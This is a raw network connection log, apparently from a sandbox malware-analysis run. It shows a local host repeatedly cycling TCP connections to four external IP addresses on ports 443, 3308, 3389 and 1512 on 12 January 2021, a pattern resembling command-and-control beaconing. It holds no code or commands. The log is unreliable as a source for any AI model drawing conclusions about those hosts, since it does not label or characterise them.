Jan 12, 2021 07:44:28.962506056 CET	49268	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:29.014703035 CET	443	49268	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:29.014946938 CET	49268	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:29.067079067 CET	443	49268	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:29.186566114 CET	443	49268	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:29.186611891 CET	443	49268	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:29.186867952 CET	49268	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:29.192559004 CET	49268	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:29.244609118 CET	443	49268	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:29.306685925 CET	49269	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:29.349981070 CET	3308	49269	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:29.350060940 CET	49269	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:29.350985050 CET	49269	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:29.394157887 CET	3308	49269	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:29.406410933 CET	3308	49269	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:29.406443119 CET	3308	49269	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:29.406514883 CET	49269	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:29.420828104 CET	49269	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:29.465931892 CET	3308	49269	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:29.466151953 CET	49269	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:29.475049019 CET	49269	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:29.475240946 CET	49269	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:29.518470049 CET	3308	49269	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:29.518737078 CET	49269	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:29.559242010 CET	3308	49269	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:29.561780930 CET	3308	49269	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:29.561810970 CET	3308	49269	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:29.675772905 CET	3308	49269	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:29.675803900 CET	3308	49269	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:29.675844908 CET	49269	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:29.675868988 CET	49269	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:29.677892923 CET	49269	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:29.720969915 CET	3308	49269	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:29.789887905 CET	49270	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:29.844568968 CET	3389	49270	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:29.844652891 CET	49270	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:29.845809937 CET	49270	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:29.900675058 CET	3389	49270	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:29.917421103 CET	3389	49270	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:29.917455912 CET	3389	49270	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:29.917520046 CET	49270	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:29.917562962 CET	49270	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:29.929586887 CET	49270	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:29.989293098 CET	3389	49270	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:29.989466906 CET	49270	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:29.998481035 CET	49270	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:29.998600960 CET	49270	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:30.053091049 CET	3389	49270	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:30.053364992 CET	49270	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:30.092955112 CET	3389	49270	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:30.107667923 CET	3389	49270	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:30.107721090 CET	3389	49270	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:30.199168921 CET	3389	49270	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:30.199213982 CET	3389	49270	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:30.199470043 CET	49270	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:30.205177069 CET	49270	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:30.259620905 CET	3389	49270	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:30.324742079 CET	49271	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:30.377804995 CET	1512	49271	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:30.377974033 CET	49271	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:30.379556894 CET	49271	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:30.432434082 CET	1512	49271	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:30.439145088 CET	1512	49271	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:30.439177036 CET	1512	49271	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:30.439271927 CET	49271	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:30.439307928 CET	49271	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:30.446940899 CET	49271	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:30.501193047 CET	1512	49271	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:30.501524925 CET	49271	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:30.511490107 CET	49271	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:30.511681080 CET	49271	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:30.564435005 CET	1512	49271	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:30.564742088 CET	49271	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:30.601721048 CET	1512	49271	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:30.617707014 CET	1512	49271	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:30.617747068 CET	1512	49271	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:30.715522051 CET	1512	49271	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:30.715570927 CET	1512	49271	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:30.715867043 CET	49271	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:30.721508026 CET	49271	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:30.774557114 CET	1512	49271	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:30.839746952 CET	49272	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:30.892076969 CET	443	49272	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:30.892344952 CET	49272	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:30.894057989 CET	49272	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:30.946383953 CET	443	49272	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:30.961344957 CET	443	49272	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:30.961668015 CET	49272	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:30.976135969 CET	49272	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:31.030905962 CET	443	49272	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:31.031006098 CET	49272	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:31.035027981 CET	49272	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:31.035155058 CET	49272	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:31.087325096 CET	443	49272	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:31.088221073 CET	49272	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:31.126876116 CET	443	49272	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:31.140505075 CET	443	49272	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:31.259103060 CET	443	49272	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:31.259150982 CET	443	49272	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:31.259356976 CET	49272	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:31.264997959 CET	49272	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:31.317235947 CET	443	49272	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:31.381402016 CET	49273	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:31.424622059 CET	3308	49273	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:31.424726009 CET	49273	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:31.425617933 CET	49273	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:31.468565941 CET	3308	49273	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:31.482551098 CET	3308	49273	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:31.482592106 CET	3308	49273	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:31.482640028 CET	49273	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:31.482662916 CET	49273	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:31.497350931 CET	49273	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:31.543026924 CET	3308	49273	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:31.543112993 CET	49273	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:31.546901941 CET	49273	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:31.547043085 CET	49273	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:31.590198040 CET	3308	49273	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:31.590352058 CET	49273	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:31.629955053 CET	3308	49273	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:31.633620977 CET	3308	49273	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:31.633661032 CET	3308	49273	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:31.746664047 CET	3308	49273	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:31.746735096 CET	3308	49273	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:31.746915102 CET	49273	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:31.749625921 CET	49273	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:31.792860031 CET	3308	49273	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:31.864916086 CET	49274	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:31.919550896 CET	3389	49274	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:31.919631004 CET	49274	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:31.920507908 CET	49274	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:31.975316048 CET	3389	49274	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:31.993011951 CET	3389	49274	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:31.993046045 CET	3389	49274	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:31.993081093 CET	49274	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:31.993125916 CET	49274	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:31.998130083 CET	49274	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:32.060144901 CET	3389	49274	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:32.060250044 CET	49274	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:32.081554890 CET	49274	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:32.081608057 CET	49274	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:32.135850906 CET	3389	49274	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:32.135948896 CET	49274	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:32.175653934 CET	3389	49274	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:32.190145969 CET	3389	49274	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:32.190176964 CET	3389	49274	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:32.280147076 CET	3389	49274	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:32.280172110 CET	3389	49274	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:32.280213118 CET	49274	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:32.280242920 CET	49274	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:32.282531977 CET	49274	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:32.336806059 CET	3389	49274	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:32.394952059 CET	49275	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:32.448127031 CET	1512	49275	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:32.448209047 CET	49275	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:32.449307919 CET	49275	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:32.502243042 CET	1512	49275	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:32.509071112 CET	1512	49275	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:32.509102106 CET	1512	49275	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:32.509133101 CET	49275	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:32.509154081 CET	49275	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:32.521966934 CET	49275	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:32.576051950 CET	1512	49275	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:32.576117992 CET	49275	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:32.584865093 CET	49275	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:32.585074902 CET	49275	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:32.638041973 CET	1512	49275	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:32.638109922 CET	49275	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:32.677804947 CET	1512	49275	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:32.691405058 CET	1512	49275	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:32.788881063 CET	1512	49275	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:32.788924932 CET	1512	49275	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:32.789052010 CET	49275	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:32.794554949 CET	49275	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:32.847558975 CET	1512	49275	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:32.912559986 CET	49276	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:32.965017080 CET	443	49276	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:32.965141058 CET	49276	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:32.966634989 CET	49276	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:33.018745899 CET	443	49276	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:33.033416033 CET	443	49276	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:33.033582926 CET	49276	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:33.050839901 CET	49276	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:33.109184027 CET	443	49276	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:33.112730980 CET	49276	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:33.123207092 CET	49276	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:33.123558998 CET	49276	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:33.175766945 CET	443	49276	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:33.175887108 CET	49276	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:33.228244066 CET	443	49276	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:33.348274946 CET	443	49276	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:33.348325968 CET	443	49276	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:33.348413944 CET	49276	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:33.351739883 CET	49276	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:33.403981924 CET	443	49276	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:33.460493088 CET	49277	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:33.503810883 CET	3308	49277	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:33.504601002 CET	49277	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:33.508604050 CET	49277	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:33.551843882 CET	3308	49277	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:33.562391043 CET	3308	49277	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:33.562434912 CET	3308	49277	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:33.562521935 CET	49277	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:33.562541008 CET	49277	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:33.572280884 CET	49277	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:33.617305994 CET	3308	49277	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:33.617408991 CET	49277	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:33.622911930 CET	49277	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:33.622929096 CET	49277	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:33.666162014 CET	3308	49277	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:33.666304111 CET	49277	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:33.709707022 CET	3308	49277	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:33.822674990 CET	3308	49277	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:33.822729111 CET	3308	49277	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:33.822804928 CET	49277	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:33.825890064 CET	49277	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:33.869091034 CET	3308	49277	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:33.942960978 CET	49278	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:33.997304916 CET	3389	49278	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:33.997392893 CET	49278	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:33.998471022 CET	49278	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:34.053054094 CET	3389	49278	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:34.068397999 CET	3389	49278	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:34.068414927 CET	3389	49278	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:34.068487883 CET	49278	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:34.076921940 CET	49278	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:34.138998032 CET	3389	49278	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:34.139060974 CET	49278	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:34.144216061 CET	49278	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:34.144335032 CET	49278	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:34.198627949 CET	3389	49278	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:34.198713064 CET	49278	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:34.237737894 CET	3389	49278	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:34.253000975 CET	3389	49278	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:34.253017902 CET	3389	49278	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:34.343195915 CET	3389	49278	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:34.343221903 CET	3389	49278	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:34.343278885 CET	49278	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:34.343312979 CET	49278	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:34.348994017 CET	49278	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:34.403531075 CET	3389	49278	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:34.455471992 CET	49279	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:34.508549929 CET	1512	49279	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:34.508652925 CET	49279	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:34.509474993 CET	49279	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:34.562344074 CET	1512	49279	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:34.569103956 CET	1512	49279	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:34.569124937 CET	1512	49279	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:34.569178104 CET	49279	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:34.582011938 CET	49279	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:34.636109114 CET	1512	49279	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:34.636177063 CET	49279	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:34.641947031 CET	49279	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:34.642163038 CET	49279	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:34.695000887 CET	1512	49279	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:34.695055962 CET	49279	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:34.733715057 CET	1512	49279	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:34.747886896 CET	1512	49279	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:34.747900009 CET	1512	49279	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:34.848601103 CET	1512	49279	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:34.848622084 CET	1512	49279	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:34.848670006 CET	49279	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:34.851610899 CET	49279	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:34.904612064 CET	1512	49279	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:34.954101086 CET	49280	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:35.006270885 CET	443	49280	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:35.006350040 CET	49280	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:35.007203102 CET	49280	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:35.059127092 CET	443	49280	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:35.080435991 CET	443	49280	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:35.080522060 CET	49280	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:35.092689037 CET	49280	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:35.147290945 CET	443	49280	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:35.147365093 CET	49280	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:35.152539015 CET	49280	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:35.152755022 CET	49280	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:35.204741001 CET	443	49280	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:35.204857111 CET	49280	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:35.242693901 CET	443	49280	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:35.256778955 CET	443	49280	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:35.375228882 CET	443	49280	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:35.375246048 CET	443	49280	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:35.375288963 CET	49280	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:35.375309944 CET	49280	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:35.378617048 CET	49280	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:35.430504084 CET	443	49280	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:35.484760046 CET	49281	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:35.527854919 CET	3308	49281	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:35.527924061 CET	49281	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:35.528759956 CET	49281	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:35.572074890 CET	3308	49281	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:35.582381964 CET	3308	49281	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:35.582407951 CET	3308	49281	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:35.582459927 CET	49281	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:35.582473040 CET	49281	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:35.595602036 CET	49281	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:35.641411066 CET	3308	49281	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:35.641592979 CET	49281	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:35.646708965 CET	49281	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:35.646728992 CET	49281	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:35.690124989 CET	3308	49281	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:35.690248013 CET	49281	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:35.729135990 CET	3308	49281	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:35.733417988 CET	3308	49281	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:35.733434916 CET	3308	49281	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:35.848346949 CET	3308	49281	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:35.848397017 CET	3308	49281	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:35.848490000 CET	49281	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:35.848510027 CET	49281	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:35.857047081 CET	49281	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:35.900105953 CET	3308	49281	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:35.968198061 CET	49282	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:36.023313046 CET	3389	49282	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:36.023380995 CET	49282	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:36.024202108 CET	49282	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:36.078641891 CET	3389	49282	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:36.098737955 CET	3389	49282	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:36.098778963 CET	3389	49282	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:36.098815918 CET	49282	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:36.098844051 CET	49282	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:36.110404015 CET	49282	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:36.173057079 CET	3389	49282	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:36.173122883 CET	49282	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:36.179383039 CET	49282	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:36.179502964 CET	49282	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:36.233942032 CET	3389	49282	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:36.234183073 CET	49282	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:36.273035049 CET	3389	49282	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:36.288510084 CET	3389	49282	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:36.288563013 CET	3389	49282	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:36.378784895 CET	3389	49282	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:36.378835917 CET	3389	49282	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:36.379102945 CET	49282	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:36.385319948 CET	49282	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:36.439697981 CET	3389	49282	5.100.228.233	192.168.2.22
